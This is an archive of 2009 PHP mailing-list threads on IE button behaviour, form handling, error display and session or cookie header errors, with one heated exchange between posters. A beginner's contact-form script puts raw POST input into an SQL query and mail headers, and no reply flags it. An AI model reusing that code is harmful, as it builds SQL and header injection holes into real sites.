> What about styling a link to look like a button with css? It won't be an
> exact match style wise but you can get close. I have done this succesfully
>
> Bastien
>
> Sent from my iPod
>
>
> On Apr 2, 2009, at 6:04, "Angus Mann" wrote:
>
> Hi all.
>>
>> I want to have several delete buttons with just one form, and depending on
>> which button is pressed, one of several items is deleted.
>>
>> So I need multiple submit buttons for 1 form, each displaying the same
>> text "Delete" to the user, but each with a different "value" so the PHP
>> script can tell them apart.
>>
>> I've used this code for the buttons...
>> Delete
>> Delete
>> Delete
>>
>> And it works just fine with firefox. But IE does not seem to pass the
>> value back to the btid so when the script asks
>> if $_POST['btid'] == "1" {
>> }
>>
>> the value 1, 2, or 3 is not given back to PHP by IE. It is given back
>> correctly by firefox and works fine.
>>
>> Any suggestions ?
>>
>> Thanks.
>>
>>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] Button id's - firefox and IE different ?
I'm sorry, you is the master o/
ps: I dont ask for them to install the jQuery, i just give an exemplo how he
can do something like that.
ps 2: I know the difference betwenn XHMTL and HTML i put the "/" there
becouse it's the force of the habit
ps 3: Why javascript is bad? you don't know develop a good interface with
that? shame on you.
ps 4: Who you think you is? everybody is here to pass something for the
others and learn something, everything i wrote its just to help, if you are
compete with others showing how much bigger you is, go to a championship or
something.
Have a nice day.
Regards,
Igor Escoar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Thu, Apr 2, 2009 at 11:01 AM, Jan G.B. wrote:
> 2009/4/2 Igor Escobar :
> > If you don't want change your form, do some function in Javascript witch
> > control the last button you clicked.
> >
>
> Javascript is bad and you don't need it.
>
> >> Delete
> >> Delete
> >> Delete
> >
> >
> >
> > I wanna make a advice to you learn more about HTML and Web Standards...
>
> I want give an advice to you: learn to make a difference out of HTML
> and XHTML. It's not the same, and is XHTML.
>
> > Don't use button type... use "input" type...
> >
>
> You forgot to mention *why* he should he use !
>
> is supported by all major browsers! So there's no need to use
> instead ...
>
> But having several or tags in one form element with
> the same NAME="" value makes no sense! Only the last one in the code
> will be submitted.
> Also, the LABEL for the button should be written like that: name="x1" value="0815">LABEL GOES HERE
>
> http://www.w3schools.com/tags/tag_button.asp
>
>
> Using might be more future-oriented.. ;)
>
>
>
> > Your javascript (using jQuery) sems like this
> >
>
> Installing and using "jquery" to have three buttons is overkill. not
> more, not less!
>
>
> byebye
>
> > $("input[name='btid']").click(function() {
> > $('#last_buttom').attr('value', $(this).val());
> > });
> >
> > And then you submit your form or something, the input "last_buttom" are
> with
> > the value of the buttom you has clicked at last time.
> >
> > Regards,
> > Igor Escobar
> > systems analyst & interface designer
> > www . igorescobar . com
> >
> >
> >
> > On Thu, Apr 2, 2009 at 8:29 AM, Phpster wrote:
> >
> >> What about styling a link to look like a button with css? It won't be an
> >> exact match style wise but you can get close. I have done this
> succesfully
> >>
> >> Bastien
> >>
> >> Sent from my iPod
> >>
> >>
> >> On Apr 2, 2009, at 6:04, "Angus Mann" wrote:
> >>
> >> Hi all.
> >>>
> >>> I want to have several delete buttons with just one form, and depending
> on
> >>> which button is pressed, one of several items is deleted.
> >>>
> >>> So I need multiple submit buttons for 1 form, each displaying the same
> >>> text "Delete" to the user, but each with a different "value" so the PHP
> >>> script can tell them apart.
> >>>
> >>> I've used this code for the buttons...
> >>> Delete
> >>> Delete
> >>> Delete
> >>>
> >>> And it works just fine with firefox. But IE does not seem to pass the
> >>> value back to the btid so when the script asks
> >>> if $_POST['btid'] == "1" {
> >>> }
> >>>
> >>> the value 1, 2, or 3 is not given back to PHP by IE. It is given back
> >>> correctly by firefox and works fine.
> >>>
> >>> Any suggestions ?
> >>>
> >>> Thanks.
> >>>
> >>>
> >> --
> >> PHP General Mailing List (http://www.php.net/)
> >> To unsubscribe, visit: http://www.php.net/unsub.php
> >>
> >>
> >
>
Re: [PHP] Button id's - firefox and IE different ?
If you read my email you can see that i just give a "solution" to him and
not a TIP.
"IF you DONT want change your form"
But if i were doing, i be doing by the right way...can be sure that.
Regards,
Igor Escoar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Fri, Apr 3, 2009 at 6:27 AM, Jan G.B. wrote:
> Igor,
> what are you doing here? You say I'm arguing to show how big I am, but
> that's not true. I corrected your misleading tipps like using JSCRIPT
> to have form essentials and using xhtml in an html context.
> no reason to get personal and/or offending.
>
> bye.
>
>
> 2009/4/2 Igor Escobar :
> > I'm sorry, you is the master o/
>
> > shame on you.
>
> > Who you think you is? everybody is here to pass something for the
> > others and learn something, everything i wrote its just to help, if you
> are
> > compete with others showing how much bigger you is, go to a championship
> or
> > something.
> >
> > Have a nice day.
> >
> > Regards,
> > Igor Escoar
> > Systems Analyst & Interface Designer
> >
> > --
> >
> > Personal Blog
> > ~ blog.igorescobar.com
> > Online Portifolio
> > ~ www.igorescobar.com
> > Twitter
> > ~ @igorescobar
> >
> >
> >
> >
> >
> > On Thu, Apr 2, 2009 at 11:01 AM, Jan G.B.
> wrote:
> >>
> >> 2009/4/2 Igor Escobar :
> >> > If you don't want change your form, do some function in Javascript
> witch
> >> > control the last button you clicked.
> >> >
> >>
> >> Javascript is bad and you don't need it.
> >>
> >> >> Delete
> >> >> Delete
> >> >> Delete
> >> >
> >> >
> >> >
> >> > I wanna make a advice to you learn more about HTML and Web
> Standards...
> >>
> >> I want give an advice to you: learn to make a difference out of HTML
> >> and XHTML. It's not the same, and is XHTML.
> >>
> >> > Don't use button type... use "input" type...
> >> >
> >>
> >> You forgot to mention *why* he should he use !
> >>
> >> is supported by all major browsers! So there's no need to use
> >> instead ...
> >>
> >> But having several or tags in one form element with
> >> the same NAME="" value makes no sense! Only the last one in the code
> >> will be submitted.
> >> Also, the LABEL for the button should be written like that: >> name="x1" value="0815">LABEL GOES HERE
> >>
> >> http://www.w3schools.com/tags/tag_button.asp
> >>
> >>
> >> Using might be more future-oriented.. ;)
> >>
> >>
> >>
> >> > Your javascript (using jQuery) sems like this
> >> >
> >>
> >> Installing and using "jquery" to have three buttons is overkill. not
> >> more, not less!
> >>
> >>
> >> byebye
> >>
> >> > $("input[name='btid']").click(function() {
> >> > $('#last_buttom').attr('value', $(this).val());
> >> > });
> >> >
> >> > And then you submit your form or something, the input "last_buttom"
> are
> >> > with
> >> > the value of the buttom you has clicked at last time.
> >> >
> >> > Regards,
> >> > Igor Escobar
> >> > systems analyst & interface designer
> >> > www . igorescobar . com
> >> >
> >> >
> >> >
> >> > On Thu, Apr 2, 2009 at 8:29 AM, Phpster wrote:
> >> >
> >> >> What about styling a link to look like a button with css? It won't be
> >> >> an
> >> >> exact match style wise but you can get close. I have done this
> >> >> succesfully
> >> >>
> >> >> Bastien
> >> >>
> >> >> Sent from my iPod
> >> >>
> >> >>
> >> >> On Apr 2, 2009, at 6:04, "Angus Mann" wrote:
> >> >>
> >> >> Hi all.
> >> >>>
> >> >>> I want to have several delete buttons with just one form, and
> >> >>> depending on
> >> >>> which button is pressed, one of several items is deleted.
> >> >>>
> >> >>> So I need multiple submit buttons for 1 form, each displaying the
> same
> >> >>> text "Delete" to the user, but each with a different "value" so the
> >> >>> PHP
> >> >>> script can tell them apart.
> >> >>>
> >> >>> I've used this code for the buttons...
> >> >>> Delete
> >> >>> Delete
> >> >>> Delete
> >> >>>
> >> >>> And it works just fine with firefox. But IE does not seem to pass
> the
> >> >>> value back to the btid so when the script asks
> >> >>> if $_POST['btid'] == "1" {
> >> >>> }
> >> >>>
> >> >>> the value 1, 2, or 3 is not given back to PHP by IE. It is given
> back
> >> >>> correctly by firefox and works fine.
> >> >>>
> >> >>> Any suggestions ?
> >> >>>
> >> >>> Thanks.
> >> >>>
> >> >>>
> >> >> --
> >> >> PHP General Mailing List (http://www.php.net/)
> >> >> To unsubscribe, visit: http://www.php.net/unsub.php
> >> >>
> >> >>
> >> >
> >
> >
>
Re: [PHP] Button id's - firefox and IE different ?
Better then READ is UNDERSTAND. Regards, Igor Escoar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Fri, Apr 3, 2009 at 11:30 AM, Jan G.B. wrote: > http://www.stimpco.com/carpix/arguingOnTheInternet.gif > > byebye > > 2009/4/3 Igor Escobar : > > If you read my email you can see that i just give a "solution" to him and > > not a TIP. > > > > "IF you DONT want change your form" > > > > But if i were doing, i be doing by the right way...can be sure that. > > > > > > Regards, > > Igor Escoar > > Systems Analyst & Interface Designer > > > > -- > > > > Personal Blog > > ~ blog.igorescobar.com > > Online Portifolio > > ~ www.igorescobar.com > > Twitter > > ~ @igorescobar > > > > > > > > > > > > On Fri, Apr 3, 2009 at 6:27 AM, Jan G.B. > wrote: > >> > >> Igor, > >> what are you doing here? You say I'm arguing to show how big I am, but > >> that's not true. I corrected your misleading tipps like using JSCRIPT > >> to have form essentials and using xhtml in an html context. > >> no reason to get personal and/or offending. > >> > >> bye. > >> > >> > >> 2009/4/2 Igor Escobar : > >> > I'm sorry, you is the master o/ > >> > >> > shame on you. > >> > >> > Who you think you is? everybody is here to pass something for the > >> > others and learn something, everything i wrote its just to help, if > you > >> > are > >> > compete with others showing how much bigger you is, go to a > championship > >> > or > >> > something. > >> > > >> > Have a nice day. > >> > > >> > Regards, > >> > Igor Escoar > >> > Systems Analyst & Interface Designer > >> > > >> > -- > >> > > >> > Personal Blog > >> > ~ blog.igorescobar.com > >> > Online Portifolio > >> > ~ www.igorescobar.com > >> > Twitter > >> > ~ @igorescobar > >> > > >> > > >> > > >> > > >> > > >> > On Thu, Apr 2, 2009 at 11:01 AM, Jan G.B. > >> > wrote: > >> >> > >> >> 2009/4/2 Igor Escobar : > >> >> > If you don't want change your form, do some function in Javascript > >> >> > witch > >> >> > control the last button you clicked. > >> >> > > >> >> > >> >> Javascript is bad and you don't need it. > >> >> > >> >> >> value="1">Delete > >> >> >> value="2">Delete > >> >> >> value="3">Delete > >> >> > > >> >> > /> > >> >> > > >> >> > I wanna make a advice to you learn more about HTML and Web > >> >> > Standards... > >> >> > >> >> I want give an advice to you: learn to make a difference out of HTML > >> >> and XHTML. It's not the same, and is XHTML. > >> >> > >> >> > Don't use button type... use "input" type... > >> >> > > >> >> > >> >> You forgot to mention *why* he should he use ! > >> >> > >> >> is supported by all major browsers! So there's no need to > use > >> >> instead ... > >> >> > >> >> But having several or tags in one form element with > >> >> the same NAME="" value makes no sense! Only the last one in the code > >> >> will be submitted. > >> >> Also, the LABEL for the button should be written like that: >> >> name="x1" value="0815">LABEL GOES HERE > >> >> > >> >> http://www.w3schools.com/tags/tag_button.asp > >> >> > >> >> > >> >> Using might be more future-oriented.. ;) > >> >> > >> >> > >> >> > >> >> > Your javascript (using jQuery) sems like this > >> >> > > >> >> > >> >> Installing and using "jquery" to have three buttons is overkill. not > >> >> more, not less! > >> >> > &g
Re: [PHP] Button id's - firefox and IE different ?
ZZzz. What what ? oh sorry, i fell in sleep. Whatever, end of discussion. Regards, Igor Escoar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Fri, Apr 3, 2009 at 11:40 AM, Jan G.B. wrote: > Is it mandatory to annoy the whole list with your crap? > If you want to keep on informing me or insulting me or feel free to > send it directly to me. I'll add you to my killfile in no time. > get a life > > 2009/4/3 Igor Escobar : > > Better then READ is UNDERSTAND. > > > >> >> >> 2009/4/2 Igor Escobar : > >> >> >> > If you don't want change your form, do some function in > Javascript > >> >> >> > witch > >> >> >> > control the last button you clicked. > > > Regards, > > Igor Escoar > > Systems Analyst & Interface Designer > > >
Re: [PHP] What is wrong with this code
You forgot to mention the "method" of the form.
...
Regards,
Igor Escoar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Fri, Apr 3, 2009 at 4:08 PM, Gary wrote:
> This is driving me nuts. I am getting blank emails and the only
> information
> that is being passed to MySQL is the IP address.
>
> Can someone tell me what is wrong with this?
>
>
>
> If you can see this, it's an anti-spam measure. Please don't
> fill in the address field.
> Address
>
>
> Name:
>
> Email Address:
>
>
> Comments:
>
>
>
>
> // Receiving variables
>
>
> $ip= $_SERVER['REMOTE_ADDR'];
> $name = $_POST['name'];
> $email = $_POST['email'];
> $comments = $_POST['comments'];
>
> //spam filter, do not touch
> if ($_POST['address'] != '' ){
>
>
> die("Changed field");
>
>}
>
> //endo fo spam filter
>
> $header = "From: $email\n"
> . "Reply-To: $email\n";
> $subject = "Response from Assessment Lawyer";
> $email_to = "sanitized";
> $message = "name: $name\n"
> . "email: $email\n"
> . "comments: $comments\n"
> ."Visitors IP: $ip\n";
> mail($email_to, $subject, $message, $header);
>
>
>
>
> $dbc= mysqli_connect(sanitized,sanitized,sanitized,sanitized)// I have
> removed the actual information, but it was connecting!
> or die('Could not connect to db');
>
> $query = "INSERT INTO sanitized VALUES(0,'$name',
> '$email','$comments','$ip')";
>
> $result = mysqli_query($dbc, $query)
> or die('Error querying database.');
>
>
>
>mysqli_close($dbc);
>
> echo 'Thank you $name for submitting your inquiry!';
> echo 'You have supplied the following information:';
> echo 'Name: $name ';
> echo 'Email Address: $email ';
> echo 'Comments: $comments';
>
> ?>
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] What is wrong with this code
If method POST is there and the information still empty...maybe you should
call to someone like a warlock... :D
Regards,
Igor Escoar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Fri, Apr 3, 2009 at 4:22 PM, Gary wrote:
> I recieve an email, it will contain the ip address, it will also contain
> the
> name:, email: , comments: but not the information from the form of the
> name or email or comments.
>
> The database also recieves only the ip address. So I assume those parts
> are
> working, but I cant seem to find why the others are not.
>
> Thanks for your reply.
>
> Gary
>
> ""kyle.smith"" wrote in message
> news:d3fe56d174abf6469079ca1a5c8474a804fa9...@nsmail01.inforonics.corp...
> Try something like print_r on $_POST to see if it contains *anything*,
> seems like it's empty?!
>
> Also, when you say blank emails I assume you mean they have the template
> you made but the variables are empty and not zero-length emails.
>
> -Original Message-
> From: Gary [mailto:gwp...@ptd.net]
> Sent: Friday, April 03, 2009 3:14 PM
> To: php-general@lists.php.net
> Subject: Re: [PHP] What is wrong with this code
>
> Its there...
>
>
> "Igor Escobar" wrote in message
> news:1f5251d50904031212o6fcc3e43q5c60b7ae373e9...@mail.gmail.com...
> > You forgot to mention the "method" of the form.
> >
> > ...
> >
> > Regards,
> > Igor Escoar
> > Systems Analyst & Interface Designer
> >
> > --
> >
> > Personal Blog
> > ~ blog.igorescobar.com
> > Online Portifolio
> > ~ www.igorescobar.com
> > Twitter
> > ~ @igorescobar
> >
> >
> >
> >
> >
> > On Fri, Apr 3, 2009 at 4:08 PM, Gary wrote:
> >
> >> This is driving me nuts. I am getting blank emails and the only
> >> information that is being passed to MySQL is the IP address.
> >>
> >> Can someone tell me what is wrong with this?
> >>
> >>
> >>
> >> If you can see this, it's an anti-spam measure. Please don't
> >> fill in the address field.
> >> Address
> >>
> >>
> >> Name:
> >>
> >> Email Address: >> type="text" /> Comments: >> name="comments" cols="50" rows=""> >> type="button" value="submit" />
> >>
> >> >>
> >> // Receiving variables
> >>
> >>
> >> $ip= $_SERVER['REMOTE_ADDR'];
> >> $name = $_POST['name'];
> >> $email = $_POST['email'];
> >> $comments = $_POST['comments'];
> >>
> >> //spam filter, do not touch
> >> if ($_POST['address'] != '' ){
> >>
> >>
> >> die("Changed field");
> >>
> >>}
> >>
> >> //endo fo spam filter
> >>
> >> $header = "From: $email\n"
> >> . "Reply-To: $email\n";
> >> $subject = "Response from Assessment Lawyer"; $email_to =
> >> "sanitized"; $message = "name: $name\n"
> >> . "email: $email\n"
> >> . "comments: $comments\n"
> >> ."Visitors IP: $ip\n";
> >> mail($email_to, $subject, $message, $header);
> >>
> >>
> >>
> >>
> >> $dbc= mysqli_connect(sanitized,sanitized,sanitized,sanitized)// I
> >> have removed the actual information, but it was connecting!
> >> or die('Could not connect to db');
> >>
> >> $query = "INSERT INTO sanitized VALUES(0,'$name',
> >> '$email','$comments','$ip')";
> >>
> >> $result = mysqli_query($dbc, $query)
> >> or die('Error querying database.');
> >>
> >>
> >>
> >>mysqli_close($dbc);
> >>
> >> echo 'Thank you $name for submitting your inquiry!'; echo 'You
> >> have supplied the following information:'; echo 'Name: $name
> >> '; echo 'Email Address: $email '; echo 'Comments:
> >> $comments';
> >>
> >> ?>
> >>
> >>
> >>
> >> --
> >> PHP General Mailing List (http://www.php.net/) To unsubscribe, visit:
>
> >> http://www.php.net/unsub.php
> >>
> >>
> >
>
>
>
> --
> PHP General Mailing List (http://www.php.net/) To unsubscribe, visit:
> http://www.php.net/unsub.php
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] Best Practices for Hiding Errors
Becarefull, error supression is slow.
Regards,
Igor Escoar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Mon, Apr 6, 2009 at 8:38 PM, Chris wrote:
>
> but they give the following warning:
>>
>> "This is a feature to support your development and should never be used on
>> production systems (e.g. systems connected to the internet)."
>>
>>Am unclear what that means - is it okay to add:
>>
>
> It's about "information disclosure".
>
> Errors/warnings/notices contain paths to php files when they are printed
> out.
>
> $ cat test.php
> ini_set('display_errors', true);
> error_reporting(E_ALL);
> echo 'a is ' . $a . "\n";
>
> $ php test.php
>
> Notice: Undefined variable: a in /path/to/test.php on line 4
>
> You don't want that because now a potential attacker knows some info - it's
> a unix type system (a windows path is drive:\blah\folder so looks different)
> and the files are located in /path/to/.
>
> If that message contains database info or passwords for example, you could
> be in trouble.
>
> ini_set('display_errors','Off');
>>
>> to my page, so that an end user won't ever get the warning displayed and I
>> can deal with the error behind the scenes? Or is there a better way to keep
>> PHP from writing error codes to the screen?
>>
>
> That's exactly the right thing to change - but only for production systems.
> You should develop with this ON so you can see when you have a problem that
> needs to be addressed. Some situations (as above) will cause a problem as
> you've seen but most won't.
>
> You can also use the @ symbol before the function name - but make sure you
> don't use it everywhere (it'll make debugging extremely hard - you could
> spend hours looking for a problem and it ends up being a database connection
> problem) & also comment your code about why you're doing it:
>
> # use the @ here because php throws a warning if it can't be opened.
> $fp = @fsockopen('blah');
>
> --
> Postgresql & php tutorials
> http://www.designmagick.com/
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] Best Practices for Hiding Errors
It's just an observation ;) If you have to use it or not, you have to decide better way. Regards, Igor Escoar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Mon, Apr 6, 2009 at 9:56 PM, Chris wrote: > Igor Escobar wrote: > >> Becarefull, error supression is slow. >> > > If it's the only way to stop an error from showing up, what's the problem? > > php will still generate the warning/notice even if display_errors is > disabled - which will be even slower. > > Plus I never said use it everywhere, I said use it in particular cases and > comment your code about why you had to use it. > > > -- > Postgresql & php tutorials > http://www.designmagick.com/ > >
Re: [PHP] redirect to a page the fist time a site is accessed
I Agree with @stuart. Regards, Igor Escoar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Thu, Apr 16, 2009 at 6:05 AM, Stuart wrote: > 2009/4/15 Don : > > I have some code in my index.php file that check the user agent and > > redirects to a warning page if IE 6 or less is encountered. > > > > 1. I'm using a framework and so calls to all pages go through index.php > > 2. The code that checks for IE 6 or less and redirects is in index.php > > > > I know how to redirect the users but what I want to do is redirect a user > > ONLY the first time the web site is accessed regardless of what page they > > first access. I would like to minimize overhead (no database). Can this > be > > done? > > Why redirect? That sucks as a user experience. Why not simply put an > alert somewhere prominent on the page with the message you want to > convey? That way you can have it on every page and not interrupt the > users use of your site. > > -Stuart > > -- > http://stut.net/ > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] $_session/$_cookie trouble
http://www.tech-recipes.com/rx/1489/solve-php-error-cannot-modify-header-information-headers-already-sent/
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Tue, Apr 28, 2009 at 3:59 PM, Ashley Sheridan
wrote:
> On Tue, 2009-04-28 at 10:48 -0400, Gary wrote:
> > I am trying to set a cookie and a session, but seem to be running into a
> > wall.
> >
> > I have tried different variations, and keep getting the same error
> message
> >
> > If I have this
> >
> > >
> > session_start();
> >
> > I get this:
> > Warning: session_start() [function.session-start]: Cannot send session
> > cookie - headers already sent by (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > Warning: session_start() [function.session-start]: Cannot send session
> cache
> > limiter - headers already sent (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > If I have this:
> > session_start();
> >
> > setcookie('sale_cookie','$sale_value', time()-3600);
> > setcookie('assess_cookie','$assess_value', time()-3600);
> > I get this
> >
> >
> > Warning: session_start() [function.session-start]: Cannot send session
> > cookie - headers already sent by (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > Warning: session_start() [function.session-start]: Cannot send session
> cache
> > limiter - headers already sent (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > Warning: Cannot modify header information - headers already sent by
> (output
> > started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 6
> >
> > Warning: Cannot modify header information - headers already sent by
> (output
> > started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 7
> >
> > If I delete and start over, I stll get the "headers already sent"... I
> have
> > tried numerous other variations, but all with the same error.
> >
> > What am I missing here?
> >
> > Thanks
> >
> > Gary
> >
> >
> >
> I would have thought it was obvious, the file assessresult.inc.php is
> being called before your session_start(). Have you put your code before
> every include?
>
>
> Ash
> www.ashleysheridan.co.uk
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] $_session/$_cookie trouble
Make sure your file isn't a UTF-8 with DOM.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Tue, Apr 28, 2009 at 5:13 PM, Ashley Sheridan
wrote:
> On Tue, 2009-04-28 at 15:34 -0400, Gary wrote:
> > Ashley
> >
> > There are 3 include files, the first is all html, but it has a form, so I
> > put the session_start above the DTD and I no longer get the error
> messages.
> >
> > I had the session_start at the beginning of the second file, the php
> > processing file, but that produced the error. It seemed to be calling to
> > itself (if that does not sound too naive).
> >
> > As I mentioned in a post above, I am no longer getting the error message,
> > but have been unable to get either the $_SESSION or the cookie to produce
> > results...
> >
> > Thanks for your help.
> >
> > Gary
> > "Ashley Sheridan" wrote in message
> > news:1240947209.3494.65.ca...@localhost.localdomain...
> > > On Tue, 2009-04-28 at 15:24 -0400, Gary wrote:
> > >> Ashley
> > >>
> > >> Thanks for your reply, but no, that is not it. There was no other
> code
> > >> prior.
> > >>
> > >> Gary
> > >> "Ashley Sheridan" wrote in message
> > >> news:1240945179.3494.61.ca...@localhost.localdomain...
> > >> > On Tue, 2009-04-28 at 10:48 -0400, Gary wrote:
> > >> >> I am trying to set a cookie and a session, but seem to be running
> into
> > >> >> a
> > >> >> wall.
> > >> >>
> > >> >> I have tried different variations, and keep getting the same error
> > >> >> message
> > >> >>
> > >> >> If I have this
> > >> >>
> > >> >> > >> >>
> > >> >> session_start();
> > >> >>
> > >> >> I get this:
> > >> >> Warning: session_start() [function.session-start]: Cannot send
> session
> > >> >> cookie - headers already sent by (output started at
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> > >> >>
> > >> >> Warning: session_start() [function.session-start]: Cannot send
> session
> > >> >> cache
> > >> >> limiter - headers already sent (output started at
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> > >> >>
> > >> >> If I have this:
> > >> >> session_start();
> > >> >>
> > >> >> setcookie('sale_cookie','$sale_value', time()-3600);
> > >> >> setcookie('assess_cookie','$assess_value', time()-3600);
> > >> >> I get this
> > >> >>
> > >> >>
> > >> >> Warning: session_start() [function.session-start]: Cannot send
> session
> > >> >> cookie - headers already sent by (output started at
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> > >> >>
> > >> >> Warning: session_start() [function.session-start]: Cannot send
> session
> > >> >> cache
> > >> >> limiter - headers already sent (output started at
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> > >> >>
> > >> >> Warning: Cannot modify header information - headers already sent by
> > >> >> (output
> > >> >> started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 6
> > >> >>
> > >> >> Warning: Cannot modify header information - headers already sent by
> > >> >> (output
> > >> >> started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > >> >> C:\xampp\htdocs\weiss\assessresult.inc.php on line 7
> > >> >>
> > >> >> If I delete and start over, I stll get the "headers already
> sent"... I
> > >> >> have
> > >> >> tried numerous other variations, but all with the same error.
> > >> >>
> > >> >> What am I missing here?
> > >> >>
> > >> >> Thanks
> > >> >>
> > >> >> Gary
> > >> >>
> > >> >>
> > >> >>
> > >> > I would have thought it was obvious, the file assessresult.inc.php
> is
> > >> > being called before your session_start(). Have you put your code
> before
> > >> > every include?
> > >> >
> > >> >
> > >> > Ash
> > >> > www.ashleysheridan.co.uk
> > >> >
> > >>
> > >>
> > >>
> > > The code is being pulled in from somewhere, have you checked to see if
> > > the framework you are using is pulling it in?
> > >
> > >
> > > Ash
> > > www.ashleysheridan.co.uk
> > >
> >
> >
> >
> There it is then. The HTML file causes the headers to be sent. Any
> output to the browser at all causes the headers to be sent, so any HTML
> or even spaces and newlines will trigger this error.
>
>
> Ash
> www.ashleysheridan.co.uk
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] Re: $_session/$_cookie trouble
A few days ago i had a problem similar to their and it was a problem with
files with BOM signature... maybe its your case.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
--
Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar
On Tue, Apr 28, 2009 at 11:00 PM, Gary wrote:
> Ok, working code. I'm sure there is some left over code that is not
> actually working, but I have been playing frankenstein all day. Basically a
> vistor fills in 3 (only two set so far) inputs to see if they qualify for a
> rebate. If they do, they can go on to file two to submit their
> information.
>
> This is my first project using $_cookie or $_session. I have done an
> exercise or two in lessons using them, but this is my first attempt from
> scratch.
>
> File1 of 2
> session_start();
> ?>
>
> $_SESSION=array('$sale_value', 'assess_value');
>
>
> $sale_value=$_POST['sale'];
> $assess_value=$_POST['assess'];
>
> $mil_rate=.03965;
> $ratio=.51;
>
> $present_tax=($assess_value) * ($mil_rate);
> $correct_tax=($sale_value)*($ratio)*($mil_rate);
> $savings=($present_tax)-($correct_tax);
>
> if ($savings > 0.00){
> echo 'Yes, Your property appears to
> qualify!';
> }
> if ($savings < 0.00){
> echo 'NO, Your property does not appear to qualify.
> ';
> }
> echo 'According to the information you have entered';?>
> echo "You believe your home would today sell for
> $".number_format($sale_value)."";
> echo "Your current tax assessment is $".number_format($assess_value)." />";
> echo 'You live in ';
> echo 'According to preliminary calculations';
> echo "You are currently paying now $".number_format($present_tax, 2)." />";
> echo "According to the information you have submitted, your taxes should be
> $ ".number_format($correct_tax, 2)."";
> ?>
> if ($savings > 0.00){
> echo "According to our preliminary calculations, a successful assessment
> appeal could save you annually on your current real estate taxes. $
> ".number_format($savings, 2)." ";
> }
> if ($savings < 0.00){
> echo 'It does not appear that an appeal would be successful in saving you
> money this year. If property values in your area continue to decline, you
> may wish to revisit the issue next year.';
> }
>
> $_SESSION['sale_value'] ='$sale_value';
> $_SESSION['assess_value'] ='$assess_value';
>
> ?>
> If you feel you have entered
> incorrect information, hit your browsers back button to re-calculate with
> the new information
> Important
> Notice!
> This DOES
> NOT
> constitute a legal opinion by ! No information has been
> submitted.
> In order to proceed with an assessment appeal, you must contact my
> office
> that we may verify all pertinent information regarding your a real estate
> assessment appeal case
>
> To submit this information to , please complete the following form.
>
>
> First Name
> Last Name
> Property Street Address
> Town or City
> Zip Code
> County
> Phone Number
> E-Mail Address
>
>
>
>
> File 2
>
>
> ?>
> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";>
> http://www.w3.org/1999/xhtml";>
>
>
> Untitled Document
>
>
>
